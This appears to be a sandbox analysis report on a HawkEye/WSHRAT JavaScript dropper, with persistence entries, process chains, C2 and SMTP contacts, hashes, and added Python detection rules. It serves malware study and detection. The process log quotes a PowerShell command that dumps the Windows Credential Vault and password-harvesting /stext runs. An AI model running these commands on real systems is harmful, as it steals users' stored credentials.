Analysis Overview
SHA256
052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c
Threat Level: Known bad
The file Scano005110.js was found to be: Known bad.
Malicious Activity Summary
HawkEye
WSHRAT
NirSoft MailPassView
NirSoft WebBrowserPassView
Nirsoft
Blocklisted process makes network request
Executes dropped EXE
Uses the VBS compiler for execution
Drops startup file
Loads dropped DLL
Looks up external IP address via web service
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-09-29 04:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-09-29 04:13
Reported
2021-09-29 04:17
Platform
win7v20210408
Max time kernel
150s
Max time network
181s
Command Line
Signatures
HawkEye
WSHRAT
NirSoft MailPassView
(8 matches, all fields N/A)
NirSoft WebBrowserPassView
(8 matches, all fields N/A)
Nirsoft
(11 matches, all fields N/A)
Blocklisted process makes network request
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fthost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fthost.exe | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1308 set thread context of 1836 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
| PID 1308 set thread context of 396 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
Enumerates physical storage devices
Script User-Agent
| Description | Indicator | Process | Target | Count |
| HTTP User-Agent header | WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A | 25 |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A | 1 |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js
C:\Users\Admin\AppData\Local\Temp\fthost.exe
"C:\Users\Admin\AppData\Local\Temp\fthost.exe"
C:\Users\Admin\AppData\Roaming\Windows Update.exe
"C:\Users\Admin\AppData\Roaming\Windows Update.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
Network
| Country | Destination | Domain | Proto | Count |
| US | 8.8.8.8:53 | astatech-cn.com | udp | 1 |
| GB | 78.110.166.82:80 | astatech-cn.com | tcp | 1 |
| US | 8.8.8.8:53 | ip-api.com | udp | 1 |
| US | 208.95.112.1:80 | ip-api.com | tcp | 1 |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp | 25 |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp | 1 |
| US | 104.16.154.36:80 | whatismyipaddress.com | tcp | 1 |
| US | 8.8.8.8:53 | mail.legacypharma.com.pk | udp | 1 |
| DE | 49.12.122.233:587 | mail.legacypharma.com.pk | tcp | 2 |
Files
memory/828-59-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\fthost.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/828-62-0x0000000074D91000-0x0000000074D93000-memory.dmp
memory/828-63-0x00000000005B0000-0x00000000005B1000-memory.dmp
\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/1308-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/1308-69-0x0000000000350000-0x0000000000351000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysInfo.txt
| MD5 | 3c77678429c241c59376b4b284bfa90f |
| SHA1 | 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633 |
| SHA256 | d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1 |
| SHA512 | f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1 |
memory/1308-71-0x0000000000366000-0x0000000000367000-memory.dmp
memory/1836-72-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1836-73-0x0000000000411654-mapping.dmp
memory/1836-75-0x0000000000400000-0x000000000041B000-memory.dmp
memory/396-77-0x0000000000442628-mapping.dmp
memory/396-76-0x0000000000400000-0x0000000000458000-memory.dmp
memory/396-79-0x0000000000400000-0x0000000000458000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\holderwb.txt
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-09-29 04:13
Reported
2021-09-29 04:16
Platform
win10-en-20210920
Max time kernel
147s
Max time network
155s
Command Line
Signatures
HawkEye
WSHRAT
NirSoft MailPassView
(10 matches, all fields N/A)
NirSoft WebBrowserPassView
(7 matches, all fields N/A)
Nirsoft
(13 matches, all fields N/A)
Blocklisted process makes network request
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fthost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js | C:\Windows\system32\wscript.exe | N/A |
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scano005110 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scano005110.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2004 set thread context of 1972 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
| PID 2004 set thread context of 600 | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target | Count |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A | 28 |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A | 1 |
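Both detonations (Script User-Agent tables for behavioral1 and behavioral2) check in with the same User-Agent layout and differ only in the host-specific fields: 40707513/QWOCTUPM on the Windows 7 image, A6E40E89/RSSLLXYN on the Windows 10 image. The parser below is an added example, not part of the sandbox report. It splits that header into positional fields so the strings can be matched and pivoted on in proxy or IDS logs. Labels such as bot_id, tag and antivirus are this example's names for positions in the string; the report does not document what each position means. The sample log lines are constructed, and pairing the WSHRAT header with 192.3.53.74:7121 is an inference from the network tables (25 and 28 connections there, matching the 25 and 28 WSHRAT header entries), not something the report states.

```python
"""Parse WSHRAT check-in User-Agent strings out of HTTP logs (added example).

WSHRAT identifies each bot to its C2 by packing host details into the HTTP
User-Agent header, '|'-separated. Field names below are this example's labels
for positions in the string; the report does not document their meaning.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed log lines: the two UAs from this report (destination pairing is
# an assumption) plus two non-WSHRAT UAs that must not match.
SAMPLE_LOG = [
    '192.3.53.74:7121 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands"',
    '192.3.53.74:7121 "WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 29/9/2021|JavaScript-v3.4|NL:Netherlands"',
    '208.95.112.1:80 "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
    '203.0.113.5:443 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/92.0"',
]

@dataclass
class WshratBeacon:
    bot_id: str        # 8 hex chars in both samples; possibly a volume serial (assumption)
    hostname: str
    username: str
    os_name: str
    tag: str           # "plus" in both samples; meaning not established here
    antivirus: str     # "nan-av" in both samples; read as "no AV found" (assumption)
    flag: str          # "false" in both samples; meaning not established here
    date: str          # d/m/yyyy; matches the detonation date in this report
    version: str       # e.g. "JavaScript-v3.4"
    country_code: str
    country_name: str

_FLAG_DATE = re.compile(r"^(?P<flag>\w+)\s*-\s*(?P<date>\d{1,2}/\d{1,2}/\d{4})$")
_LOG_LINE = re.compile(r'^(?P<dst>\S+)\s+"(?P<ua>[^"]*)"$')

def parse_wshrat_ua(ua: str) -> Optional[WshratBeacon]:
    """Return a WshratBeacon for a WSHRAT-format UA, or None if it is not one."""
    parts = ua.split("|")
    if len(parts) != 10 or parts[0] != "WSHRAT":
        return None
    m = _FLAG_DATE.match(parts[7].strip())
    if not m:
        return None
    code, _, name = parts[9].strip().partition(":")
    return WshratBeacon(
        bot_id=parts[1].strip(), hostname=parts[2].strip(),
        username=parts[3].strip(), os_name=parts[4].strip(),
        tag=parts[5].strip(), antivirus=parts[6].strip(),
        flag=m["flag"], date=m["date"], version=parts[8].strip(),
        country_code=code, country_name=name,
    )

def scan_log(lines: List[str]) -> List[Tuple[str, WshratBeacon]]:
    """Return (destination, beacon) for every line whose UA parses as WSHRAT."""
    hits = []
    for line in lines:
        m = _LOG_LINE.match(line.strip())
        if m and (beacon := parse_wshrat_ua(m["ua"])) is not None:
            hits.append((m["dst"], beacon))
    return hits

if __name__ == "__main__":
    for dst, b in scan_log(SAMPLE_LOG):
        print(f"{dst}: {b.version} bot {b.bot_id} on {b.hostname}\\{b.username} ({b.os_name}, {b.country_code})")
```

The strict checks (exactly ten fields, literal WSHRAT prefix, a flag-date pair in position 7) are what keep a loose "contains WSHRAT" rule from matching benign traffic that merely mentions the string; the hostname, username and bot_id fields are the natural pivot keys when hunting for other infected hosts in the same proxy logs.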
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Update.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js
C:\Users\Admin\AppData\Local\Temp\fthost.exe
"C:\Users\Admin\AppData\Local\Temp\fthost.exe"
C:\Users\Admin\AppData\Roaming\Windows Update.exe
"C:\Users\Admin\AppData\Roaming\Windows Update.exe"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
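The two process lists (behavioral1 and behavioral2) show the same chain: wscript.exe runs the .js from Temp, fthost.exe is dropped and run, it in turn runs Windows Update.exe from Roaming, and that process sets the thread context of two vbc.exe children (PID 1308 into 1836 and 396 on Windows 7; 2004 into 1972 and 600 on Windows 10) whose command lines carry /stext. The VB.NET compiler has no such switch; NirSoft's password recovery tools do, which is consistent with the NirSoft MailPassView and WebBrowserPassView signatures and the holdermail.txt / holderwb.txt output files. On the Windows 10 image the script additionally runs PowerShell to dump the Windows Credential Vault into tmp.txt and drops cmdc.exe, also run with /stext. The rule set below is an added example, not part of the report: it runs over Sysmon-style process, registry and file events built from these command lines and the Run-key entries above. PIDs, the event schema, the rule names and the benign vbc.exe control row are constructed; images, command lines and registry values are copied from the report. One rule also surfaces the detail that the "Windows Update" Run value points at WindowsUpdate.exe (no space) while the file that actually ran is "Windows Update.exe"; the report does not say whether that mismatch is deliberate.

```python
"""Rules for the HawkEye/WSHRAT chain in Sysmon-style events (added example).
Event schema, rule names and PIDs are constructed; images, command lines and
registry values are copied from this report's behavioral2 run."""
import re
from collections import defaultdict

# Constructed events modelled on Sysmon EventID 1 (process create),
# 13 (registry value set) and 11 (file create). PIDs are illustrative.
EVENTS = [
    {"type": "process", "pid": 10, "ppid": 1,
     "image": r"C:\Windows\system32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js"},
    {"type": "process", "pid": 11, "ppid": 10,
     "image": r"C:\Users\Admin\AppData\Local\Temp\fthost.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\fthost.exe"'},
    {"type": "process", "pid": 12, "ppid": 11,
     "image": r"C:\Users\Admin\AppData\Roaming\Windows Update.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\Windows Update.exe"'},
    {"type": "process", "pid": 13, "ppid": 12,
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"'},
    {"type": "process", "pid": 14, "ppid": 10,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"'},
    {"type": "process", "pid": 15, "ppid": 10,
     "image": r"C:\Users\Admin\AppData\Local\Temp\cmdc.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata'},
    # Benign control (constructed): a developer really compiling VB.NET.
    {"type": "process", "pid": 16, "ppid": 2,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe",
     "cmdline": r"vbc.exe /noconfig /out:App.exe Program.vb"},
    {"type": "registry", "pid": 10,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Scano005110",
     "data": r'wscript.exe //B "C:\Users\Admin\AppData\Local\Temp\Scano005110.js"'},
    {"type": "registry", "pid": 12,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update",
     "data": r"C:\Users\Admin\AppData\Roaming\WindowsUpdate.exe"},
    {"type": "file", "pid": 10,
     "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scano005110.js"},
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
TEMP_SCRIPT = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.jse?\b", re.I)
STEXT = re.compile(r"\s/stext\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
STARTUP_EXTS = (".js", ".jse", ".vbs", ".vbe", ".lnk", ".exe")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def first_token(cmd):
    """Executable part of a command line, honouring a leading quoted path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]

def triage(events):
    """Return {rule_name: [pid, ...]} for every event that trips a rule."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    seen_images = {p["image"].lower() for p in procs.values()}
    hits = defaultdict(list)
    for e in events:
        pid = e["pid"]
        if e["type"] == "process":
            img, cmd = basename(e["image"]), e["cmdline"]
            parent = procs.get(e["ppid"])
            stext = STEXT.search(cmd) is not None
            # vbc.exe (the VB.NET compiler) has no /stext switch; NirSoft's password
            # recovery tools do. A hollowed vbc.exe running one looks exactly like this.
            if stext and img == "vbc.exe":
                hits["nirsoft_in_vbc"].append(pid)
            # The same switch on a binary dropped under AppData (cmdc.exe here).
            if stext and USER_WRITABLE.search(e["image"]):
                hits["nirsoft_stext_from_userland"].append(pid)
            # A compiler whose parent lives under AppData is suspect on its own.
            if img == "vbc.exe" and parent and USER_WRITABLE.search(parent["image"]):
                hits["vbc_spawned_from_userland"].append(pid)
            if img in ("wscript.exe", "cscript.exe") and TEMP_SCRIPT.search(cmd):
                hits["wsh_script_from_temp"].append(pid)
            if img == "powershell.exe" and "PasswordVault" in cmd and "RetrievePassword" in cmd:
                hits["credential_vault_dump"].append(pid)
        elif e["type"] == "registry" and RUN_KEY.search(e["key"]):
            target = first_token(e["data"])
            if basename(target) in SCRIPT_HOSTS:
                hits["run_key_script_host"].append(pid)
            elif USER_WRITABLE.search(target):
                hits["run_key_userland_exe"].append(pid)
                # The value should name a file that was seen running; here it does not
                # ("WindowsUpdate.exe" vs the dropped "Windows Update.exe").
                if target.lower() not in seen_images:
                    hits["run_key_target_not_observed"].append(pid)
        elif e["type"] == "file" and STARTUP_DIR.search(e["path"]) \
                and e["path"].lower().endswith(STARTUP_EXTS):
            hits["startup_folder_drop"].append(pid)
    return dict(hits)

if __name__ == "__main__":
    for rule, pids in sorted(triage(EVENTS).items()):
        print(f"{rule:30s} pids={pids}")
```

The parent-child rule (vbc_spawned_from_userland) is the one worth keeping even if the /stext string changes: a .NET compiler started by a binary under AppData has no legitimate reason to exist on a workstation, and it fires before the hollowed process has written anything to disk. The Run-key target check is cheap to run against any persistence entry and catches typos and decoys of this kind as well as entries whose target was cleaned up by AV.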
Network
| Country | Destination | Domain | Proto | Count |
| US | 8.8.8.8:53 | astatech-cn.com | udp | 1 |
| GB | 78.110.166.82:80 | astatech-cn.com | tcp | 1 |
| US | 8.8.8.8:53 | ip-api.com | udp | 1 |
| US | 208.95.112.1:80 | ip-api.com | tcp | 1 |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp | 28 |
| US | 8.8.8.8:53 | wshsoft.company | udp | 1 |
| SG | 194.59.164.67:80 | wshsoft.company | tcp | 1 |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp | 1 |
| US | 104.16.154.36:80 | whatismyipaddress.com | tcp | 1 |
| US | 8.8.8.8:53 | mail.legacypharma.com.pk | udp | 1 |
| DE | 49.12.122.233:587 | mail.legacypharma.com.pk | tcp | 2 |
Files
C:\Users\Admin\AppData\Local\Temp\fthost.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/2768-115-0x0000000000000000-mapping.dmp
memory/2768-118-0x0000000000900000-0x0000000000901000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/2004-119-0x0000000000000000-mapping.dmp
memory/2004-122-0x0000000002D40000-0x0000000002D41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysInfo.txt
| MD5 | 3c77678429c241c59376b4b284bfa90f |
| SHA1 | 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633 |
| SHA256 | d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1 |
| SHA512 | f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1 |
memory/1972-124-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1972-125-0x0000000000411654-mapping.dmp
memory/2004-127-0x0000000002D44000-0x0000000002D46000-memory.dmp
memory/2004-126-0x0000000002D41000-0x0000000002D42000-memory.dmp
memory/1972-128-0x0000000000400000-0x000000000041B000-memory.dmp
memory/600-129-0x0000000000400000-0x0000000000458000-memory.dmp
memory/600-130-0x0000000000442628-mapping.dmp
